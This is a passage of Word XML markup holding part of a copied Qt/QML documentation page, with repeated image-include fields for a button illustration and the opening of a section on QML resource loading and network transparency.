                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>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E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D">
            <w:pPr>
              <w:pStyle w:val="centeralign"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00690F6E">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00690F6E">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00690F6E">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D72F99">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D72F99">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00D72F99">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002B6E64">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="002B6E64">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="002B6E64">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CF4C26">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CF4C26">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00CF4C26">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00821B8B">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00821B8B">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00821B8B">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0061520D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0061520D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="0061520D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00211A68">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00211A68">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00211A68">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00395997">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00395997">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00395997">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B75670">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B75670">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00B75670">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B73CF4">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B73CF4">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00B73CF4">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00610870">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00610870">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00610870">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B55535">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B55535">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00B55535">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002E1325">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="002E1325">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="002E1325">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00253BB1">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00253BB1">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00253BB1">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BD2950">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BD2950">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00BD2950">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="008E2997">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008E2997">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="008E2997">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00450174">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00450174">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00450174">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B31A2B">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B31A2B">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00B31A2B">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000C4D6F">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000C4D6F">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="000C4D6F">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B34EC9">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B34EC9">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00B34EC9">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C50BB7">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C50BB7">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00C50BB7">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005A2BD2">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005A2BD2">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png"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"http://doc.qt.io/qt-5/images/button-types.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r w:rsidR="00490E7E">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002230B8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:pict>
                <v:shape id="_x0000_i1027" type="#_x0000_t75" alt="" style="width:1in;height:115.2pt">
                  <v:imagedata r:id="rId349" r:href="rId350"/>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00C50BB7">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00B34EC9">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="000C4D6F">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00B31A2B">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00450174">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="008E2997">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00BD2950">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00253BB1">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="002E1325">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00B55535">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00610870">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00B73CF4">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00B75670">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00395997">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00211A68">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="0061520D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00821B8B">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00CF4C26">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="002B6E64">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00D72F99">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00690F6E">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Please see the documentation about</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId351" w:history="1">
        <w:r w:rsidRPr="00E21B6D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>defining object types in documents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for in-depth information on the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00690F6E" w:rsidRDefault="00E21B6D" w:rsidP="007022E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="430" w:name="resource-loading-and-network-transparenc"/>
      <w:bookmarkStart w:id="431" w:name="_Toc483000623"/>
      <w:bookmarkStart w:id="432" w:name="_Toc483003640"/>
      <w:bookmarkStart w:id="433" w:name="_Toc483603976"/>
      <w:bookmarkStart w:id="434" w:name="_Toc483605196"/>
      <w:bookmarkEnd w:id="430"/>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resource Loading and Network Transparency</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
      <w:bookmarkEnd w:id="432"/>
      <w:bookmarkEnd w:id="433"/>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is important to note that </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31BD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML is network-transparent</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007022E0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Applications can import documents from remote paths just as simply as documents from local paths</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In fact, any</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property may be assigned a remote or local URL, and the QML engine will handle any network communication involved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Please see the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
